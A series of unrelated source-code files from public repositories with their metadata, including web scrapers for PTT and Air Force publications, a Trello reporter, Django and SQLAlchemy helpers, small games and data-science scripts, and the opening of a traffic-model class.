12f82502a50aa68c38ef68424a7ca051b4fa9948 | 3cb9b94a2ddbc3b6f65a10efd63db4a84619a7d8 | /crawler.py | 6d4d469a97002d77f948f3c1448f2a68923fc798 | [] | no_license | allen0818/simple-ptt-crawler | f01fd33ffb09d3f33bf674b1edd7c96ae7d4fe38 | 6ed729903b3f7a53578271ae0f7c1bfc99df45c2 | refs/heads/master | 2021-05-21T02:19:49.442198 | 2020-04-02T16:18:09 | 2020-04-02T16:18:09 | 252,499,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,348 | py | import urllib.request as req
from bs4 import BeautifulSoup
# NSWITCH_BOARD =
url_nswitch = "https://www.ptt.cc/bbs/NSwitch/index.html"
url_gossiping = "https://www.ptt.cc/bbs/Gossiping/index.html"
def get_titles(url):
# fetch website
request = req.Request(url, headers={
"cookie": "over18=1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
})
with req.urlopen(request) as response:
data = response.read().decode("utf-8")
# use bs4 to parse specific data
root = BeautifulSoup(data, "html.parser")
titles = root.find_all("div", class_="title")
for title in titles:
if title.a:
print(title.a.string)
# return url of next page
next_page_btn = root.find("a", string="‹ 上頁")
return next_page_btn["href"]
def get_multipages(board, url, page_count=None):
print("Articles in {}:".format(board))
next_page = url
if page_count:
count = 0
while count < page_count:
next_page = "http://www.ptt.cc" + get_titles(next_page)
count += 1
else:
get_titles(next_page)
def run():
get_multipages("NSwitch", url_nswitch)
get_multipages("Gossiping", url_gossiping, 3)
if __name__ == '__main__':
run() | [
"chshman310222@gmail.com"
] | chshman310222@gmail.com |
1c8937910a3a56ccad8dea727c5b37a6074a5cc7 | fae08819d8f0e72999adb74f653a4b088578d6dc | /API/desafio-api-produtos/api_produtos/api_produtos/asgi.py | 6e30b5a724c974985c1b02b09da8e5c1e40f47b8 | [] | no_license | konkah/desafio-aws-eks | a321a77d57ab2f60ce64dbb5755efde1b3919c56 | 0b159540e84b5ad71cb02f0da925f27abd9e7c6a | refs/heads/main | 2023-06-18T10:35:00.520565 | 2021-07-14T20:15:09 | 2021-07-14T20:15:09 | 383,628,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
ASGI config for api_produtos project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_produtos.settings')
application = get_asgi_application()
| [
"karlos.hbraga@gmail.com"
] | karlos.hbraga@gmail.com |
4d5ad693ce20e9b97da95b0ef67213eb07bc3c1f | 03a10a552e3019e23efb38086b239659183b59c5 | /src/tiles.py | 9a62ef786790072c5d44c7e7c8a4ca34abcb3e98 | [
"MIT"
] | permissive | GreenXenith/zoria | 54a5c067a7d460a9126acf9c2085ad3ee5905fe1 | 30a16baab3643c820613a8c8669ee6235a2cd47c | refs/heads/master | 2023-02-22T14:19:34.674436 | 2021-01-29T22:03:44 | 2021-01-29T22:03:44 | 334,269,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import pygame
global registered_tiles
registered_tiles = {}
# Content IDs are currently unused
# They would be used for map-saving
content_ids = []
content_id_map = {}
def register_tile(name, definition):
registered_tiles[name] = definition
content_id_map[name] = len(content_ids)
content_ids.append(name)
def get_content_id(name):
try:
return content_id_map[name]
except:
return None
def get_tile_from_content_id(id):
try:
return registered_tiles[content_ids[id]]
except:
return None
class Tile:
textures = ["none.png"]
solid = True
rotation = 0
def __init__(self, name, pos):
self.name = name
self.pos = pos
for key in registered_tiles[name]:
value = registered_tiles[name][key]
if not callable(value):
setattr(self, key, value)
def get(self, key):
try:
return getattr(self, key)
except:
return None
def set_rotation(self, rot):
self.rotation = rot
def get_rotation(self):
return self.rotation
def is_solid(self):
return self.get("solid") == True
def on_step(self, dtime, map, player):
if "on_step" in registered_tiles[self.name]:
registered_tiles[self.name]["on_step"](self, dtime, map, player)
| [
"24834740+GreenXenith@users.noreply.github.com"
] | 24834740+GreenXenith@users.noreply.github.com |
fb125b831dfdd12ef020ba37e389a57e9312650c | 08379db5712432b34767d747b9f078ab30822d74 | /tdd/counter.py | 7b6c18b587d99d5bf211cdcbdafb50576a2a4e78 | [
"MIT"
] | permissive | scotttrumpy/Python-Fizzbuzz | 7fa739d3be5487e9e40f9a2285a96a2ed825b52b | c9bafd436a22533634bbf58458ce82942cb21268 | refs/heads/master | 2021-09-10T15:43:27.110072 | 2018-03-28T19:22:39 | 2018-03-28T19:22:39 | 125,870,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | def fizzbuzz (count):
if count % 15 == 0:
return('Fizzbuzz')
elif count % 3 == 0:
return('Fizz')
elif count % 5 == 0:
return('Buzz')
else:
return count
def main():
for count in range(1,101):
print fizzbuzz(count)
if __name__=='__main__':
main()
| [
"trumpysm@dukes.jmu.edu"
] | trumpysm@dukes.jmu.edu |
1eccb89c21839695c2e7fceeac48858578fdcc38 | 6e9df4bf681978c15d408b1e8f8278f26a0346b4 | /complete/bayes_sampling.py | d66267184769140ba310bf49c3cb5c896a0c850d | [] | no_license | dungdinhanh/gan_training | f3177972d857594ed5fd52f7b9d0e157b6680695 | 4e80f0e8f112f4e4d6a7d937f30ba0cfa09e1339 | refs/heads/master | 2020-09-13T09:41:03.941638 | 2019-12-20T09:20:21 | 2019-12-20T09:20:21 | 222,729,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,370 | py | import numpy as np
from scipy.stats import multivariate_normal as mvn
from complete.util import *
from matplotlib import pyplot as plt
from sklearn.mixture import BayesianGaussianMixture
class SingleGauss:
means_ = None
count = None
@staticmethod
def get_mean():
if SingleGauss.means_ is None:
SingleGauss.means_ = []
SingleGauss.count = 0
return SingleGauss.means_
else:
return SingleGauss.means_
def __init__(self):
self.y = None
self.mean = None
self.cov = None
def fit(self, X):
self.mean = X.mean(axis=0)
mean = SingleGauss.get_mean()
mean.append(self.mean)
self.y = SingleGauss.count
SingleGauss.count+=1
self.cov = np.cov(X.T)
def sample(self):
return np.array([mvn.rvs(mean=self.mean, cov=self.cov)]), self.y
class BayesianSampler:
def __init__(self, model):
self.model = model
def fit(self, X, Y, fit_clusters=False ,default_clusters=10):
self.K = len(set(Y))
self.gaussians = []
self.mean_y = Y.mean()
self.std_y = Y.std()
for k in range(self.K):
print("Fitting model " + str(self.model), k)
Xk = X[Y==k]
if not fit_clusters:
mod = self.model()
else:
mod = self.model(default_clusters)
mod.fit(Xk)
self.gaussians.append(mod)
def sample_given_y(self, y: int):
mod = self.gaussians[y]
sample = mod.sample()
mean = mod.means_[sample[1]]
return sample[0].reshape(28, 28), mean.reshape(28, 28)
pass
def sample(self):
y = max(0, min(10, np.random.normal(self.mean_y, self.std_y)))
return self.sample_given_y(int(y))
if __name__ == '__main__':
# b = BayesianSampler(BayesianGaussianMixture)
# mnist = get_mnist()
# b.fit(mnist[0], mnist[1], fit_clusters=True)
#
# for k in range(b.K):
# gen, mean = b.sample_given_y(k)
# plt.subplot(1, 2, 1)
# plt.imshow(gen, cmap='gray')
# plt.title("generatate")
# plt.subplot(1, 2, 2)
# plt.imshow(mean, cmap='gray')
# plt.title("mean")
# plt.show()
#
# gen, mean = b.sample()
# plt.subplot(1, 2, 1)
# plt.imshow(gen, cmap='gray')
# plt.title("random generate")
# plt.subplot(1, 2, 2)
# plt.imshow(gen, cmap='gray')
# plt.title("random mean")
# plt.show()
b = BayesianSampler(SingleGauss)
mnist = get_mnist()
b.fit(mnist[0], mnist[1])
k = input("Input digit: ")
gen, mean = b.sample_given_y(int(k))
plt.subplot(1, 2, 1)
plt.imshow(gen, cmap='gray')
plt.title("generatate")
plt.subplot(1, 2, 2)
plt.imshow(mean, cmap='gray')
plt.title("mean")
plt.show()
for k in range(b.K):
gen, mean = b.sample_given_y(k)
plt.subplot(1, 2, 1)
plt.imshow(gen, cmap='gray')
plt.title("generatate")
plt.subplot(1, 2, 2)
plt.imshow(mean, cmap='gray')
plt.title("mean")
plt.show()
gen, mean = b.sample()
plt.subplot(1, 2, 1)
plt.imshow(gen, cmap='gray')
plt.title("random generate")
plt.subplot(1, 2, 2)
plt.imshow(gen, cmap='gray')
plt.title("random mean")
plt.show()
| [
"dinhanhdung1996@gmail.com"
] | dinhanhdung1996@gmail.com |
64e7542df83df9bd0d6edf9f81dd3c5add9aef71 | 0800aac473cbb94f3ac263c202979498c326cf18 | /법인세_총설.py | a437c75324c85c0332211d27ad24fe8df470b893 | [] | no_license | DanielHennyKwon/TAX_LIM_JEONG | 8f12e072c044cd17646f196c17b51d1e0cae179e | a263b4e90f0ac78500382047bf7ae72380213ca8 | refs/heads/master | 2023-06-16T10:50:55.111407 | 2021-07-11T02:59:50 | 2021-07-11T02:59:50 | 384,847,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,432 | py | # -*- coding: utf-8 -*-
# 2018-12-24 권달현
import 결산의확정, 신고납부절차, 기한후신고, 수정신고, 경정청구, 법인의분류, 세금의종류, 실질과세, 소액주주, 대주주, 중소기업, 이월과세, 과세이연, 세무조정, 소득처분, 법인세비용, 세액계산_구조,세무조정_흐름도
_={
"결산의 확정":결산의확정.결산의확정,
"법인세의 신고납부절차":신고납부절차.법인세,
"기한후신고":기한후신고.법인세,
"수정신고":수정신고._,
"경정청구":경정청구._,
"법인세법상 법인의 분류":법인의분류.법인세,
"법인세의 종류":세금의종류.법인세,
"실질과세":실질과세.법인세,
"소액주주":소액주주.법인세,
"대주주":대주주.법인세,
"중소기업":중소기업._,
"이월과세":이월과세.법인세,
"과세이연":과세이연.법인세,
"세무조정 흐름도":세무조정_흐름도.법인세,
"세무조정":세무조정.법인세,
"소득처분":소득처분.법인세,
"법인의 각 사업연도소득과 과세표준 및 세액계산의 구조":세액계산_구조.법인세,
"법인세비용":법인세비용.법인세,
}
#___________________________________________________
제목='법인세 총설'
tax=_
import wx
class MyFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self,parent=None,title=제목)
self.SetSize(420,320*2)
self.mainPanel=wx.Panel(self)
self.expandButton=wx.Button(self.mainPanel,label='펼침')
self.tree=wx.TreeCtrl(self.mainPanel)
root=self.tree.AddRoot(제목)
for i in tax:
ii=self.tree.AppendItem(root,i)
for j in tax[i]:
jj=self.tree.AppendItem(ii,j)
for k in tax[i][j]:
kk=self.tree.AppendItem(jj,k)
for m in tax[i][j][k]:
mm=self.tree.AppendItem(kk,m)
for n in tax[i][j][k][m]:
nn=self.tree.AppendItem(mm,n)
for p in tax[i][j][k][m][n]:
pp=self.tree.AppendItem(nn,p)
for q in tax[i][j][k][m][n][p]:
qq=self.tree.AppendItem(pp,q)
for r in tax[i][j][k][m][n][p][q]:
rr=self.tree.AppendItem(qq,r)
self.staticText =wx.TextCtrl(self.mainPanel,style=wx.TE_MULTILINE)
self.vtBoxSizer=wx.BoxSizer(wx.VERTICAL)
self.vtBoxSizer.Add(self.expandButton,0,wx.EXPAND|wx.ALL,5)
self.vtBoxSizer.Add(self.tree ,5,wx.EXPAND|wx.ALL,5)
self.vtBoxSizer.Add(self.staticText ,0,wx.EXPAND|wx.ALL,5)
self.mainPanel.SetSizer(self.vtBoxSizer)
self.Bind(wx.EVT_BUTTON ,self.OnExpandButton,self.expandButton)
self.Bind(wx.EVT_TREE_SEL_CHANGED,self.OnNodeSelected,self.tree)
def OnExpandButton(self,e):
self.tree.ExpandAll()
def OnNodeSelected(self,e):
selected=self.tree.GetSelection()
self.staticText.SetLabel(self.tree.GetItemText(selected))
self.mainPanel.Layout()
if __name__=='__main__':
app=wx.App()
frame=MyFrame()
frame.Show()
app.MainLoop()
#___________________________________________________ | [
"cpahouse@naver.com"
] | cpahouse@naver.com |
655a655620f983caafb5b12283dfc5b1c274d08d | de28880dd1c46d0ee2def7e46066d12185fc9a4b | /sketchRnn_clean_v3/tools/utils.py | 9458cfa2b2c2a28c3ca8f8fc65b2e8572ea10cad | [] | no_license | frederictamagnan/PredictDrumFillsInNativeInstrumentsSoundPack | c3712987352a152edf91e893e8af1b23fd17f495 | 2a19d43d5c153340f0a7a50e7314c4763a6089a4 | refs/heads/master | 2020-04-10T04:16:11.417914 | 2019-04-28T16:18:51 | 2019-04-28T16:18:51 | 160,793,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,282 | py | PATH = '/home/ftamagna/Documents/_AcademiaSinica/dataset/lpd_5/lpd_5_cleansed/'
PATH_TAGS = [
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Blues.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Country.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Electronic.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Folk.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Jazz.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Latin.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Metal.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_New-Age.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Pop.id', # 8
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Punk.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Rap.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Reggae.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_RnB.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Rock.id', # 13
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_World.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Unknown.id'
]
PATH_TAGS_ROCK = [
'/home/ftamagna/Documents/_AcademiaSinica/code/LabelDrumFills/id_lists/tagtraum/tagtraum_Rock.id',
]
import os
from random import randint
def tensor_to_numpy(array):
return array.cpu().data.numpy()
def random_file(filepath_dataset=PATH,path_tags=PATH_TAGS_ROCK):
all=[]
# ITERATE OVER THE TAG LISTS
for tag_i, tag in enumerate(path_tags):
print('>>' + tag[29:-3])
with open(tag, 'r') as f:
# ITERATE OVER THE FOLDER LISTS
for i, file in enumerate(f):
# (str(f))
# print('load files..{}/{}'.format(i + 1, number_files[tag_i]), end="\r")
file = file.rstrip()
middle = '/'.join(file[2:5]) + '/'
p = filepath_dataset + middle + file
for npz in os.listdir(p):
if 'label' not in npz and 'metrics' not in npz:
all.append((p+'/',npz))
pick=all[randint(0,len(all))]
return pick
| [
"frederic.tamagnan@gmail.com"
] | frederic.tamagnan@gmail.com |
096bc0ec339e35fa0708f8f760dd66381cdcf5eb | bd64c5926f5a6d17f823d48eb27070a9e4c93e49 | /main.py | f3bd374d376d3a9bb7954013e34465e803abb3d2 | [
"MIT"
] | permissive | ahamlinman/trello-reporter | 9768ef58ea6215f8e59ce38e4f40e751dee7e013 | 601e7f74592f89a6424bf20a38b63153f80091e1 | refs/heads/master | 2021-08-08T01:57:59.260557 | 2020-08-23T04:35:25 | 2020-08-23T04:38:36 | 214,364,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,073 | py | #!/usr/bin/env python3
from datetime import datetime, timedelta
from pprint import pprint
import argparse
import json
import os
from dateutil.parser import parse as parse_date
from mailer import send_email
from reporter import Reporter
from trello import TrelloClient
def older_than(date_str, delta_spec):
date = parse_date(date_str)
return datetime.now(tz=date.tzinfo) - date > timedelta(**delta_spec)
def build_report(config, trello):
reporter = Reporter()
for list_spec in config["lists"]:
trello_list = trello.list(list_spec["listId"])
old_cards = [
card
for card in trello_list["cards"]
if older_than(card["dateLastActivity"], list_spec["timeDelta"])
]
if not old_cards:
continue
reporter.add_section(trello_list["name"], [card["name"] for card in old_cards])
if not reporter.sections:
return None
return reporter.format(config["heading"])
def run_report(config, email=False):
trello = TrelloClient(os.getenv("TRELLO_KEY"), os.getenv("TRELLO_TOKEN"))
report_text = build_report(config, trello)
if report_text is None:
print("(nothing to report)")
return
if email:
result = send_email(config["emailAddress"], config["subject"], report_text)
pprint(result)
else:
print(report_text)
def lambda_handler(event, _context):
run_report(event, True)
def main():
parser = argparse.ArgumentParser(description="Report on old Trello cards.")
parser.add_argument(
"--config",
type=str,
default="config.json",
metavar="FILE",
help="path to the JSON config file " "(default: config.json)",
)
parser.add_argument(
"--email",
action="store_true",
help="send an email instead of printing the report",
)
args = parser.parse_args()
with open(args.config, "r") as config_file:
config = json.load(config_file)
run_report(config, args.email)
if __name__ == "__main__":
main()
| [
"alex@alexhamlin.co"
] | alex@alexhamlin.co |
b080960023d3de4b6813fe57e3f48af239f29069 | 836fcb1fb4db3d2b6d0d9b54c3f916bc599a0b62 | /ClassInterface2.py | 3842cd4a687fcb9ac5f6b695d29199ec4b6d536c | [] | no_license | opickers90/Python3-1 | cf8c544ee17107f535e4431fbe67eb4e218fff70 | 04b2338ddfb7c554cc123677a769b2f4dafbdc5b | refs/heads/master | 2020-04-19T11:01:35.793376 | 2019-02-02T11:11:04 | 2019-02-02T11:11:04 | 168,155,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | class InsurancePolicy:
def __init__(self, price_of_item):
self.price_of_insured_item = price_of_item
class VehicleInsurance(InsurancePolicy):
def get_rate(self):
return self.price_of_insured_item * .001
class HomeInsurance(InsurancePolicy):
def get_rate(self):
return self.price_of_insured_item * .00005
vehicle = VehicleInsurance(2000)
home = HomeInsurance(2000)
def InsuranceTotal(vehicle_or_home):
print(vehicle_or_home.get_rate())
for insurance in [vehicle, home]:
InsuranceTotal(insurance)
| [
"taufik@LI-320s"
] | taufik@LI-320s |
a65776b895a6918affe05ddf0fd3dea283e97182 | 52a7fd3ef46cb0a29b42ab11386721ece0f51a56 | /env/lib/python2.7/site-packages/sqlalchemy_utils/expressions.py | 150c6fa6e53759ac18827ad54c0720835a405707 | [] | no_license | nicolas3355/AUBOOST | 95f8b2c0503fd1dfecdbceb9f1a0e88b786a3b4b | 6af5593ef85c675336850e7e1691cb267cb26315 | refs/heads/master | 2016-08-04T03:28:12.180742 | 2015-06-29T17:41:53 | 2015-06-29T17:41:53 | 38,261,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | import sqlalchemy as sa
from sqlalchemy.sql import expression
from sqlalchemy.ext.compiler import compiles
from sqlalchemy_utils.types import TSVectorType
class tsvector_match(expression.FunctionElement):
type = sa.types.Unicode()
name = 'tsvector_match'
@compiles(tsvector_match)
def compile_tsvector_match(element, compiler, **kw):
args = list(element.clauses)
if len(args) < 2:
raise Exception(
"Function 'tsvector_match' expects atleast two arguments."
)
return '(%s) @@ %s' % (
compiler.process(args[0]),
compiler.process(args[1])
)
class to_tsquery(expression.FunctionElement):
type = sa.types.Unicode()
name = 'to_tsquery'
@compiles(to_tsquery)
def compile_to_tsquery(element, compiler, **kw):
if len(element.clauses) < 1:
raise Exception(
"Function 'to_tsquery' expects atleast one argument."
)
return 'to_tsquery(%s)' % (
', '.join(map(compiler.process, element.clauses))
)
class plainto_tsquery(expression.FunctionElement):
type = sa.types.Unicode()
name = 'plainto_tsquery'
@compiles(plainto_tsquery)
def compile_plainto_tsquery(element, compiler, **kw):
if len(element.clauses) < 1:
raise Exception(
"Function 'plainto_tsquery' expects atleast one argument."
)
return 'plainto_tsquery(%s)' % (
', '.join(map(compiler.process, element.clauses))
)
class tsvector_concat(expression.FunctionElement):
type = TSVectorType()
name = 'tsvector_concat'
@compiles(tsvector_concat)
def compile_tsvector_concat(element, compiler, **kw):
return ' || '.join(map(compiler.process, element.clauses))
class array_get(expression.FunctionElement):
name = 'array_get'
@compiles(array_get)
def compile_array_get(element, compiler, **kw):
args = list(element.clauses)
if len(args) != 2:
raise Exception(
"Function 'array_get' expects two arguments (%d given)." %
len(args)
)
if not hasattr(args[1], 'value') or not isinstance(args[1].value, int):
raise Exception(
"Second argument should be an integer."
)
return '(%s)[%s]' % (
compiler.process(args[0]),
sa.text(str(args[1].value + 1))
)
| [
"nicolaselhaddad.nh@gmail.com"
] | nicolaselhaddad.nh@gmail.com |
996050481c43d0fc4419ad5c97ca943a18676fea | 08bb966a6eb75877429630787a7adcb090685cb9 | /web_scraping/link_scrapers/link_scraper_majcom.py | 8ef4bbd895461f08cedc85db64b0f8e976a6fd4e | [
"MIT"
] | permissive | RANDCorporation/policy2vec | 946dd6743b22bafa31926400695b5485136fe9b5 | a309217115b2163241313a239671b2ab84169b3e | refs/heads/master | 2023-04-09T11:10:46.303654 | 2021-04-20T23:41:11 | 2021-04-20T23:41:11 | 359,979,373 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,055 | py | # Network Analysis of Vaccination Strategies
# Copyright (C) 2020 by The RAND Corporation
# See LICENSE and README.md for information on usage and licensing
## Imports
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from time import sleep
import pandas as pd
#import tabula
import time
import os
import pynput
from pynput.keyboard import Key, Controller
import re
import math
import datetime
## Set-up
parent_url = "https://www.e-publishing.af.mil/Product-Index/"
options = webdriver.ChromeOptions()
profile = {"plugins.plugins_list": [{"enabled": False, "name": "Chrome PDF Viewer"}], "download.extensions_to_open": ""}
#option.add_argument(“ -- incognito”)
## set-up the chrome driver
from os.path import dirname, abspath
chromedriver_path = dirname(dirname(abspath(__file__))) + '/chromedriver'
driver = webdriver.Chrome(executable_path=chromedriver_path, options=options)
driver.get(parent_url)
keyboard = Controller()
## Get the AF MAJCOM-Level pubs
#MAJCOM
get_internet = driver.find_element_by_xpath('//*[@id="mvcContainer-449"]/div[2]/div[1]/div[1]/ul/li[4]/a')
get_internet.click()
time.sleep(3)
top_level_url = driver.current_url
print(top_level_url)
## scan through the different MAJCOMs
hrefs = []
titles = []
for m in range(1,11):
## navigate to the top-level page
driver.get(top_level_url)
## select the MAJCOM
get_internet = driver.find_element_by_xpath('//*[@id="cat-2"]/div/ul/li[' + str(m) + ']/a')
print('navigating to: ' + get_internet.text)
get_internet.click()
time.sleep(3)
## select All-Pubs
get_internet = driver.find_element_by_xpath('//*[@id="org-list"]/div[1]/ul/li[1]/a')
get_internet.click()
time.sleep(3)
## find out how many pages there are
s = driver.find_element_by_xpath('//*[@id="data_info"]').text
s = s[s.index('of'):]
num_docs = int(re.sub("[^0-9]", "", s))
num_pages = math.ceil(num_docs/10)
## scan through multiple pages (each of which shows 10 items)
print('scanning through %i pages' %num_pages)
count = 0
for j in range(1,num_pages+1):
## click on the appropriate page number
if j <= 4:
k = j
if j == 5:
k = 5
elif num_pages > 5 and 5 < j and j < num_pages-1:
k = 4
elif num_pages > 5 and j == num_pages-1:
k = 5
elif num_pages > 5 and j == num_pages:
k = 6
get_internet = driver.find_element_by_xpath('//*[@id="data_paginate"]/span/a[' + str(k) + ']')
get_internet.click()
## scan through a single page
for i in range(1,11):
## try/except since the last page will have less than 10 items
try:
element = driver.find_element_by_xpath('//*[@id="data"]/tbody/tr[' + str(i) + ']/td[1]/a')
title_xpath = '//*[@id="data"]/tbody/tr[' + str(i) + ']/td[2]'
titles.append(driver.find_element_by_xpath(title_xpath).text)
hrefs.append(element.get_attribute('href'))
count += 1
except:
pass
print('page: %i, links:%i ' %(j, count))
## Save the links and document titles as a csv file
import pandas as pd
if not os.path.exists('logs'):
os.makedirs('logs')
source_link = [parent_url]*len(hrefs)
source = ['Air Force E-Publishing']*len(hrefs)
date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
link_date = [date]*len(hrefs)
df = pd.DataFrame({'Title':titles, 'source':source, 'source link':source_link, 'link':hrefs, 'link date':link_date})
df.to_csv('logs/AF_epubs_majcom.csv', index=False)
### Save the links
#with open('links/AF_epubs_majcom.txt', 'w') as f:
# for item in hrefs:
# f.write("%s\n" % item)
## close the session
driver.quit()
| [
"gshartnett@gmail.com"
] | gshartnett@gmail.com |
222c5178a7adba45b63bfa89f62fe5db08357f6f | 31a49331912b64586e4c811403d335d054ad0172 | /cardcalc/__init__.py | 44e34496838c665917e2a4dbfd607e95b2c0266c | [] | no_license | kuwoyuki/kadocalc | 1645827ec385f8d2c5744f5092c38328ad20e10d | cf2e4a8f6d5937c1210b854642eec0f3ac38343b | refs/heads/master | 2022-12-27T11:15:29.924433 | 2020-10-15T16:33:36 | 2020-10-15T16:33:36 | 298,285,986 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | from .core import app
def main():
app() | [
"kuwoyuki@gmail.com"
] | kuwoyuki@gmail.com |
a84953050ba040b805bbbeb0174345a641f84c25 | d48b46f53cb1b54899e6f84863c5f275d17b0f0d | /lab_09/utils.py | aa6240241cbc03d043995fa83a36a0d0f79a1b72 | [] | no_license | ivaaahn/bmstu-cg | 36c26768aa398a56dd3661ef5f067be90a7abcd5 | 9cb70730d9c4f0e4ad172ff5018bed7ae6ccbd2d | refs/heads/main | 2023-06-11T23:15:33.751793 | 2021-06-22T20:23:24 | 2021-06-22T20:23:24 | 343,135,970 | 1 | 0 | null | 2021-03-13T13:17:32 | 2021-02-28T15:16:13 | Python | UTF-8 | Python | false | false | 105 | py | W, H = 1236, 941
def custom_round(num: float) -> int:
return int(num + (0.5 if num > 0 else -0.5))
| [
"ivahnencko01@gmail.com"
] | ivahnencko01@gmail.com |
e9327ec7e2122b53dc3b6ba3560a822de0e43c08 | 740b4f75dbede3c7d81e2fbd55e81ae62fe88589 | /Mutuales/models.py | 8c847d0be6b02ac64179b7764475e59861de8415 | [] | no_license | juancastelli1/FederacionMut | e45ced865ab3082ceacb678458b7390c9502be54 | 48ec18b4ce92d39306b77b51e10c26e6991d314d | refs/heads/master | 2023-08-17T12:41:48.248851 | 2021-09-29T19:03:40 | 2021-09-29T19:03:40 | 411,431,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | from django.db import models
from django.db.models.fields import AutoField
from backend.deptos import deptos_tucuman
# Create your models here.
"""
Construyo la entidad para los servicios
"""
class servicios(models.Model):
id_servicio=models.AutoField(primary_key=True)
servicio=models.CharField(max_length=20)
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now_add=True)
class Meta:
db_table='servicios'
verbose_name='servicio'
verbose_name_plural='servicios'
ordering=['servicio']
def __str__(self):
cadena = str(self.id_servicio) + ' - ' + str(self.servicio)
return cadena
"""
Construyo la entidad para las omutuales
"""
class mutuales(models.Model):
id_mutual=models.AutoField(primary_key=True)
nombre=models.CharField(max_length=100)
sucursal=models.CharField(max_length=30, choices=deptos_tucuman)
##id_servicio=models.ForeignKey(servicios, on_delete=models.CASCADE)
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now_add=True)
class Meta:
db_table='mutuales'
verbose_name='mutual'
verbose_name_plural='mutuales'
ordering=['id_mutual']
def __str__(self):
cadena = str(self.id_mutual) + ' - ' + str(self.nombre) + ' - ' + str(self.sucursal)
return cadena
class servicio_mutual(models.Model):
id_serv_mut = AutoField(primary_key=True)
id_mutual=models.ForeignKey(mutuales, on_delete=models.CASCADE)
id_servicio=models.ForeignKey(servicios, on_delete=models.CASCADE)
class Meta:
db_table='servicio_mutuales'
verbose_name='servicio_mutual'
verbose_name_plural='servicios_mutual'
ordering=['id_mutual']
unique_together = ('id_mutual', 'id_servicio',)
| [
"juancastelli12345@gmail.com"
] | juancastelli12345@gmail.com |
4f11e5a9b9a6bb26ab4f1092072e1ee5fbba1ab3 | 6407cca09a68be7ff28ad8ce31fa43af5d099eb3 | /oldbkp_mao_data/TrafficModels.py | ed28f706a7aa1debf781fa3b45465c1b133c7a7a | [] | no_license | hannnni/lkw_algo | 34936fdda7b6e10112845358ea03a6a17ecf1389 | f6cbd5a14cafe0203097499fd3b836a8cf326c42 | refs/heads/master | 2021-01-18T14:11:10.944867 | 2014-11-11T22:21:58 | 2014-11-11T22:21:58 | 26,492,296 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39,002 | py |
import os
import string
import random
import csv
import numpy# as np
import scipy
import pygame
import math
global NetworkFileName
#, signalPlanFileName
#filename = 'networkTest.csv'
NetworkFileName = 'NetworkTestFeld.csv'
#signalPlanFileName = 'temporarySp.csv'
"""
Should predefine link Number or should be read from the excle sheet?
"""
global NumberOfLinks
NumberOfLinks = 158#or can be readed from excel tables????, wenn constant , then need to be checked!!!
global simulationCycle, cycleTime, simulationTime
simulationCycle = 3
cycleTime = 70
simulationTime = simulationCycle*cycleTime
#have to be the same as in test.py, or should all passed from there....
class linkInfor:
def __init__(self):
self.linkID = []
self.linkLength = []
self.linkCapacity = []
self.isTurning = []
self.isInLink = []
self.isOutLink = []
self.isSignalized = []
self.mergeFrom = []
self.divergeTo = []
self.extraDivergeTo = []
#just in case that all the variables dont get the initial empty value!!!!
def init_Link(self):
self.linkID = []
self.linkLength = []
self.linkCapacity = []
self.isTurning = []
self.isInLink = []
self.isOutLink = []
self.isSignalized = []
self.mergeFrom = []
self.divergeTo = []
self.extraDivergeTo = []
class CellTransmissionModel:
def __init__(self):
self.linkIDs = []
self.linkCapacitys = []
self.linkMaxFlows = []
self.currentStatuses = []
self.previousStatuses = []
self.currentFlows = []
self.previousFlows = []
#maybe not need if a list of sublist is used
#self.linkIndexForStatus = []
#self.linkIndexForFlow = []
#ID Index:
self.mergeFromIds = []
self.divergeToIds = []
self.extraDivergeToIds =[]
self.mergeFromIdsList = []
self.divergeToIdsList = []
self.extraDivergeToIdsList =[]
